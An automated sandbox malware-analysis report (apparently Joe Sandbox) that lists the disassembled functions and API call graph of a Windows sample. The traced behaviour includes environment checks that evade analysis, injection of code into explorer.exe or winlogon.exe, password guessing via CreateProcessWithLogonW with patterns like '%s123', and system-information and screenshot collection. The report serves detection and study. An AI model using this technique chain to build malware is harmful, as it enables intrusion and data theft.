                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Variant$ClearInit$Alloc$CreateHeapInitializeString$DecrementFileInstanceInterlockedMappingProcessSecurity
                                                                                                                                                                                                            • String ID: cmd.exe$p=5w
                                                                                                                                                                                                            • API String ID: 3029307448-760121691
                                                                                                                                                                                                            • Opcode ID: ce624a195721d34df8c0ff0fb2f0b689a1a1700c9ed8d61842eb4ad22ab92356
                                                                                                                                                                                                            • Instruction ID: 9e23888bed06d8ec6237e29dc82f696ab5e76098d001fcea0e973b2596c5eb93
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce624a195721d34df8c0ff0fb2f0b689a1a1700c9ed8d61842eb4ad22ab92356
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F10875E002199FCB00DFA8C884A9EBBB9FF88710F1581AAE914BB351D774AD01CF94
                                                                                                                                                                                                            Function 00401D80 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,7702DB30), ref: 00401DA6
                                                                                                                                                                                                            • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,7702DB30), ref: 00401DC2
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401E08
                                                                                                                                                                                                            • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401E19
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401E3A
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401E45
                                                                                                                                                                                                              • Part of subcall function 004017F0: memset.MSVCRT ref: 0040181B
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401833
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 00401860
                                                                                                                                                                                                              • Part of subcall function 004017F0: memset.MSVCRT ref: 00401873
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              • Part of subcall function 004017F0: memset.MSVCRT ref: 004018DD
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapAlloc.KERNEL32(00000000), ref: 0040193A
                                                                                                                                                                                                              • Part of subcall function 004017F0: memset.MSVCRT ref: 0040194A
                                                                                                                                                                                                              • Part of subcall function 004017F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
                                                                                                                                                                                                              • Part of subcall function 004017F0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019B6
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019C5
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019D5
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401EAA
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 004019E1
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapValidate.KERNEL32(00000000), ref: 004019F4
                                                                                                                                                                                                              • Part of subcall function 004017F0: GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
                                                                                                                                                                                                              • Part of subcall function 004017F0: HeapFree.KERNEL32(00000000), ref: 00401A04
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401EEA
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00401F26
                                                                                                                                                                                                            • SwitchToThread.KERNEL32(?,?,00404D20,?,?,?), ref: 00401F6F
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(?), ref: 00401F95
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                            • String ID: %s1$%s12$%s123
                                                                                                                                                                                                            • API String ID: 1588441251-2882894844
                                                                                                                                                                                                            • Opcode ID: 63274706b62708f42648d06670bacef668267c51d1314ddcf6f9b5beb05922d2
                                                                                                                                                                                                            • Instruction ID: d6d119788ade0702c334ba716b850de2f597c51d849c979d1570e7f46e431759
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63274706b62708f42648d06670bacef668267c51d1314ddcf6f9b5beb05922d2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5651B6B25043015BD331DB54C844EEB73A8AFD8754F000A2EFA846B2D1DB78DA48CBA6
                                                                                                                                                                                                            Function 004027B0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 34COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20112,?,?,00402D7C), ref: 004027B9
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20112), ref: 004027CA
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004027D6
                                                                                                                                                                                                            • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 004027E6
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004027EC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                            • String ID: Fri Jun 17 05:52:09 20112$PnEw$explorer.exe$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3001685711-2451428161
                                                                                                                                                                                                            • Opcode ID: d14c921f1184c696d62da8aac8ded89f8ce8efe24655d3e49b352df140887ec9
                                                                                                                                                                                                            • Instruction ID: 466661b1ea48edbd92509d7abf6a2a5afa49196c9ec5a44dbf6f5976db38d1d5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d14c921f1184c696d62da8aac8ded89f8ce8efe24655d3e49b352df140887ec9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AF08CB460020566EA5077E1AE0AB6B3A1CAB84B90F104137FF00B72E0EAB8DC0046FC
                                                                                                                                                                                                            Function 00402ED0 Relevance: 13.5, APIs: 9, Instructions: 39memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402ED7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300,004035BE,7735E610,00402EBE), ref: 00402EEF
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00402EF2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300), ref: 00402EFF
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402F02
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004035BE,004035BE,7735E610,00402EBE), ref: 00402F0B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00402F0E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004035BE), ref: 00402F1B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402F1E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2629017576-0
                                                                                                                                                                                                            • Opcode ID: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
                                                                                                                                                                                                            • Instruction ID: 47c24e4de567f4ebe007c7ce519db5101e5d5be497eca443f574c4ff2f4d9865
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BF0DAB1656211ABEA102BA59E8CF572A6CEF85B82F040525B708F71D0CAB4DC40D67C
                                                                                                                                                                                                            Function 004014B0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004014D4
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,7702DB30), ref: 004014DF
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 00401505
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 00401520
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 0040152C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401548
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040155A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3955875343-0
                                                                                                                                                                                                            • Opcode ID: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
                                                                                                                                                                                                            • Instruction ID: 35ff206d6e877699644ac5607af1a2cdaefe1b2aeb9dd15ae369335d4f3073ea
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D11C3B25042146BD310DF65DC0899BBBACEBD53A0F00453AFE55A72D0E33499088BEA
                                                                                                                                                                                                            Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040135A
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
                                                                                                                                                                                                            • Instruction ID: 796e466c09054be0152a46d456eb4211c9760dde1472f6724dae78271da73244
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d14c2f9e698ac929ed0932fb87d06ba4f74ade3cc07b29cd2c75e337da446871
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E80126712003045BC314AB6AAC81696B7DEAB84706341413BEE05F36A2C23AD8048BAC
                                                                                                                                                                                                            Function 004012A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004012AB
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            • Opcode ID: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
                                                                                                                                                                                                            • Instruction ID: b56d10f3903839679d055e287fe873ff32dc311f96dddc7098b711b9a384a0cf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: eae13d97ce2cff1767e69285929d2bc7f9bbc3e812787a57d7dc8512338ae20e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65E04FB07413045BD714BFB6AD09A1637DD9BC47073968036BB09F21E1DA39C814CA6D

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:3.2%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:85.5%
                                                                                                                                                                                                            Signature Coverage:15.7%
                                                                                                                                                                                                            Total number of Nodes:1075
                                                                                                                                                                                                            Total number of Limit Nodes:25
                                                                                                                                                                                                            execution_graph 80797 2c95bf9 80798 2c95b51 80797->80798 80799 2c95c8b 80798->80799 80800 2c95b8c memcpy 80798->80800 80802 2c97290 80798->80802 80800->80798 80805 2c972b0 80802->80805 80804 2c972a5 80804->80798 80806 2c972fc 80805->80806 80807 2c972bf 80805->80807 80808 2c97303 ReadFile 80806->80808 80811 2c97316 80806->80811 80809 2c972d1 memcpy 80807->80809 80807->80811 80808->80811 80810 2c972f1 80809->80810 80810->80804 80811->80804 80812 402c10 LoadLibraryA GetModuleFileNameA 80884 403900 RegOpenKeyExA 80812->80884 80815 402c44 ExitProcess 80816 402c4c 80898 4020b0 CreateFileA 80816->80898 80821 402c81 80909 402240 CreateFileA 80821->80909 80822 402c69 GetTickCount PostMessageA 80822->80821 80831 402ca1 80974 401d80 40 API calls 80831->80974 80832 402cc3 IsUserAnAdmin GetModuleHandleA 80834 402cfc 80832->80834 80835 402cdd GetProcAddress 80832->80835 80836 402d02 80834->80836 80837 402d4e 80834->80837 80835->80834 80839 402cef GetCurrentProcess 80835->80839 80840 402d06 StrStrIA 80836->80840 80841 402d1c 80836->80841 80844 402d56 StrStrIA 80837->80844 80845 402ddd 80837->80845 80838 402ca6 80842 402cb2 80838->80842 80843 402caa ExitProcess 80838->80843 80839->80834 80840->80841 80846 402d3f 80840->80846 80935 402810 RegCreateKeyExA 80841->80935 80975 403440 70 API calls 80842->80975 80850 402d81 80844->80850 80851 402d6c 80844->80851 80848 402810 9 API calls 80845->80848 80976 402950 93 API calls 80846->80976 80854 402de8 GlobalFindAtomA 80848->80854 80979 402950 93 API calls 80850->80979 80857 402810 9 API calls 80851->80857 80861 402e38 ExitProcess 80854->80861 80862 402df8 GlobalAddAtomA IsUserAnAdmin 80854->80862 80856 402cb7 80856->80832 80864 402cbb ExitProcess 80856->80864 80858 402d77 80857->80858 80978 4027b0 43 API calls 80858->80978 80860 402d86 GlobalFindAtomA 80867 402dd6 80860->80867 80868 402d96 GlobalAddAtomA IsUserAnAdmin 80860->80868 80869 402e19 IsUserAnAdmin 80862->80869 80870 402e09 80862->80870 80863 402d44 80977 4011c0 9 API calls 80863->80977 80981 4011c0 9 API calls 80867->80981 80874 402db7 IsUserAnAdmin 80868->80874 80875 402da7 80868->80875 80876 402e24 80869->80876 80870->80869 80873 402d49 80873->80861 80877 402dc2 80874->80877 80875->80874 80982 4014b0 7 API calls 80876->80982 80980 4014b0 7 API calls 80877->80980 80880 402e2f 80880->80861 80882 401580 32 API calls 80880->80882 80881 402dcd 80881->80867 80883 401580 32 API calls 80881->80883 80882->80861 80883->80867 80885 40394a RegQueryValueExA 80884->80885 80886 4039ad GetUserNameA CharUpperA strstr 80884->80886 80889 40397b RegCloseKey 80885->80889 80890 40396f RegCloseKey 80885->80890 80887 402c40 80886->80887 80888 4039eb strstr 80886->80888 80887->80815 80887->80816 80888->80887 80891 403a04 strstr 80888->80891 80889->80886 80893 40398e 80889->80893 80890->80886 80891->80887 80892 403a1d GetSystemWindowsDirectoryA GetVolumeInformationA 80891->80892 80892->80887 80894 403a5d 80892->80894 80893->80886 80893->80887 80894->80887 80895 403a79 GetModuleFileNameA StrStrIA 80894->80895 80895->80887 80896 403aa5 StrStrIA 80895->80896 80896->80887 80897 403ab7 StrStrIA 80896->80897 80897->80887 80899 402230 80898->80899 80900 402200 DeviceIoControl CloseHandle 80898->80900 80901 401fc0 memset SHGetFolderPathA 80899->80901 80900->80899 80902 402087 80901->80902 80903 40201e PathAppendA SetCurrentDirectoryA 80901->80903 80904 402092 FindWindowA 80902->80904 80905 40208b FreeLibrary 80902->80905 80903->80902 80906 402041 LoadLibraryA 80903->80906 80904->80821 80904->80822 80905->80904 80906->80902 80907 402055 GetProcAddress 80906->80907 80907->80902 80908 402065 80907->80908 80908->80902 80910 4022e3 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 80909->80910 80911 402324 80909->80911 80910->80911 80912 402330 SHGetFolderPathA 80911->80912 80913 402415 80912->80913 80914 402357 80912->80914 80916 402420 SHGetFolderPathA 80913->80916 80914->80914 80915 4023cc MoveFileA 80914->80915 80915->80913 80917 40254f 80916->80917 80918 40244b CreateFileA 80916->80918 80921 402560 CoInitializeEx 80917->80921 80918->80917 80920 4024b1 11 API calls 80918->80920 80920->80917 80922 40258e 80921->80922 80923 40259f GetModuleFileNameW SysAllocString 80921->80923 80922->80923 80925 4027a4 IsUserAnAdmin 80922->80925 80924 4025cd SysAllocString 80923->80924 80930 402746 80923->80930 80926 402733 SysFreeString 80924->80926 80927 4025de CoCreateInstance 80924->80927 80925->80831 80925->80832 80929 402743 SysFreeString 80926->80929 80926->80930 80928 402707 80927->80928 80932 402605 80927->80932 80928->80926 80929->80930 80930->80925 80931 40279e CoUninitialize 80930->80931 80931->80925 80932->80926 80932->80928 80933 402693 CoCreateInstance 80932->80933 80934 4026b5 80933->80934 80934->80928 80936 402855 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 80935->80936 80937 4028dd RegCreateKeyExA 80935->80937 80939 4028c0 80936->80939 80938 402924 80937->80938 80937->80939 80940 40292c RegFlushKey RegCloseKey 80938->80940 80941 40293d GetCurrentProcessId 80938->80941 80939->80939 80942 40291e RegSetValueExA 80939->80942 80940->80941 80943 401580 80941->80943 80942->80938 80944 4017e3 Sleep 80943->80944 80946 401596 80943->80946 80944->80861 80947 4015b5 80946->80947 80948 4015ab Sleep 80946->80948 80983 401c70 memset CreateToolhelp32Snapshot 80946->80983 80949 401c70 11 API calls 80947->80949 80948->80946 80948->80947 80950 4015bc 80949->80950 80950->80944 80951 4015c4 OpenProcess 80950->80951 80951->80944 80952 4015df GetModuleHandleA 80951->80952 80953 401616 80952->80953 80954 4015fb GetProcAddress 80952->80954 80956 40161c GetModuleHandleA 80953->80956 80957 40164f VirtualAllocEx 80953->80957 80954->80953 80955 401609 GetCurrentProcess 80954->80955 80955->80953 80958 401632 GetProcAddress 80956->80958 80959 40163e 80956->80959 80960 4017c0 GetHandleInformation 80957->80960 80961 401692 WriteProcessMemory 80957->80961 80958->80959 80959->80957 80959->80960 80960->80944 80962 4017d6 80960->80962 80963 4016be 80961->80963 80964 40172f WriteProcessMemory FlushInstructionCache CreateRemoteThread 80961->80964 80962->80944 80967 4017dc CloseHandle 80962->80967 80968 4016c1 VirtualAlloc 80963->80968 80972 401729 80963->80972 80965 401772 GetHandleInformation 80964->80965 80966 40179e RtlCreateUserThread 80964->80966 80969 401795 80965->80969 80970 401788 80965->80970 80966->80960 80967->80944 80968->80963 80971 4016d9 memcpy WriteProcessMemory VirtualFree 80968->80971 80969->80960 80970->80969 80973 40178e CloseHandle 80970->80973 80971->80963 80972->80964 80973->80969 80974->80838 80975->80856 80976->80863 80977->80873 80978->80873 80979->80860 80980->80881 80981->80873 80982->80880 80984 401cb0 GetLastError 80983->80984 80985 401d08 Module32First 80983->80985 80986 401d6b 80984->80986 80987 401cbf SwitchToThread CreateToolhelp32Snapshot 80984->80987 80988 401d24 80985->80988 80994 401cd5 80985->80994 80986->80946 80987->80986 80987->80994 80989 401d30 StrStrIA 80988->80989 80992 401d42 StrStrIA 80989->80992 80993 401d4e Module32Next 80989->80993 80990 401ce3 GetHandleInformation 80991 401cff 80990->80991 80995 401cf2 80990->80995 80991->80946 80992->80993 80992->80994 80993->80989 80993->80994 80994->80990 80994->80991 80995->80991 80996 401cf8 CloseHandle 80995->80996 80996->80991 80997 2c73940 80998 2c73fd8 80997->80998 81002 2c73965 80997->81002 80999 2c73a6e 80999->80998 81058 2c73750 RegOpenKeyExA 80999->81058 81000 2c739ca VirtualQuery 81001 2c739f5 VirtualQuery VirtualQuery 81000->81001 81000->81002 81001->81002 81002->80998 81002->80999 81002->81000 81007 2c73ab2 SymSetOptions GetCurrentProcess SymInitialize 81008 2c73ad4 GetCurrentProcess 81007->81008 81010 2c73b0e 81007->81010 81069 2c73830 81008->81069 81010->81010 81078 2c93910 VirtualQuery 81010->81078 81012 2c73b34 81079 2c93910 VirtualQuery 81012->81079 81014 2c73b44 GetLastError _snprintf 81080 2c93910 VirtualQuery 81014->81080 81016 2c73bbc 81025 2c73bd8 81016->81025 81212 2c93910 VirtualQuery 81016->81212 81018 2c73c38 GetCurrentThread ZwQueryInformationThread 81020 2c73c55 GetCurrentProcess 81018->81020 81023 2c73c95 81018->81023 81019 2c73bcc 81213 2c93910 VirtualQuery 81019->81213 81024 2c73830 6 API calls 81020->81024 81027 2c73d13 81023->81027 81028 2c73cf8 GetCurrentProcess 81023->81028 81024->81023 81025->81018 81025->81023 81025->81025 81026 2c73fc7 VirtualFree 81026->80998 81027->81026 81030 2c73d42 PathAddBackslashA 81027->81030 81029 2c73830 6 API calls 81028->81029 81029->81023 81031 2c73d56 81030->81031 81031->81031 81032 2c73d70 PathAddBackslashA 81031->81032 81081 2c73090 81032->81081 81038 2c73dc0 81038->81038 81039 2c73dd8 GetDateFormatA GetTimeFormatA _snprintf 81038->81039 81040 2c73e56 PathAddBackslashA 81039->81040 81042 2c73ea0 81040->81042 81091 2c74920 CreateFileA 81042->81091 81046 2c73f20 81133 2c93950 GetDesktopWindow GetWindowDC 81046->81133 81048 2c73f75 81159 2c764b0 CreateFileA 81048->81159 81050 2c73f80 81050->81026 81160 2c766a0 WriteFile 81050->81160 81052 2c73fa1 81161 2c93e00 81052->81161 81054 2c73fa6 PathAddBackslashA 81166 2c825c0 EnterCriticalSection GetCurrentDirectoryA _snprintf SetCurrentDirectoryA 81054->81166 81056 2c73fbc 81209 2c76a10 81056->81209 81059 2c7378e RegQueryValueExA 81058->81059 81060 2c737ab 81058->81060 81059->81060 81061 2c737b2 RegCloseKey 81060->81061 81062 2c737b9 81060->81062 81061->81062 81062->80998 81063 2c737c0 RegOpenKeyExA 81062->81063 81064 2c73810 81063->81064 81065 2c737ea RegSetValueExA 81063->81065 81067 2c73817 RegCloseKey 81064->81067 81068 2c7381e VirtualAlloc 81064->81068 81065->81064 81066 2c73806 RegFlushKey 81065->81066 81066->81064 81067->81068 81068->80998 81068->81007 81071 2c73844 81069->81071 81070 2c7392a 81070->81010 81071->81070 81072 2c73869 SymGetModuleBase 81071->81072 81073 2c73893 SymGetModuleInfo 81072->81073 81074 2c73912 _snprintf 81072->81074 81073->81074 81075 2c738a6 SymGetSymFromAddr 81073->81075 81074->81070 81076 2c738c0 _snprintf 81075->81076 81077 2c738ee _snprintf 81075->81077 81076->81010 81077->81010 81078->81012 81079->81014 81080->81016 81082 2c730a0 81081->81082 81214 2c766d0 81082->81214 81085 2c769d0 81086 2c769d4 CreateDirectoryA 81085->81086 81087 2c73d9a PathAddBackslashA 81085->81087 81086->81087 81088 2c769e1 GetLastError IsUserAnAdmin 81086->81088 81087->81038 81089 2c769f4 PathMakeSystemFolderA 81088->81089 81090 2c769fb SetLastError 81088->81090 81089->81090 81090->81087 81092 2c73efd PathAddBackslashA 81091->81092 81093 2c74a5f WriteFile WriteFile WriteFile GetModuleFileNameA WriteFile 81091->81093 81092->81046 81094 2c74ad0 81093->81094 81094->81094 81095 2c74ad7 WriteFile WriteFile GetUserNameA WriteFile 81094->81095 81096 2c74b30 81095->81096 81096->81096 81097 2c74b37 WriteFile WriteFile GetEnvironmentVariableA WriteFile 81096->81097 81098 2c74b90 81097->81098 81098->81098 81099 2c74b97 WriteFile WriteFile GetSystemDefaultLangID memset 81098->81099 81100 2c74be1 WriteFile 81099->81100 81102 2c74c50 81100->81102 81102->81102 81103 2c74c57 8 API calls 81102->81103 81104 2c74cd5 81103->81104 81104->81104 81105 2c74cdc WriteFile WriteFile GetDateFormatA WriteFile 81104->81105 81106 2c74d40 81105->81106 81106->81106 81107 2c74d47 WriteFile WriteFile GetTimeFormatA WriteFile 81106->81107 81108 2c74da7 81107->81108 81108->81108 81109 2c74dae WriteFile WriteFile GetTimeZoneInformation _snprintf WriteFile 81108->81109 81110 2c74e61 81109->81110 81110->81110 81111 2c74e68 WriteFile WriteFile WriteFile 81110->81111 81237 2c74070 GetTickCount _snprintf 81111->81237 81113 2c74ea6 81238 2c74070 GetTickCount _snprintf 81113->81238 81115 2c74ec1 WriteFile 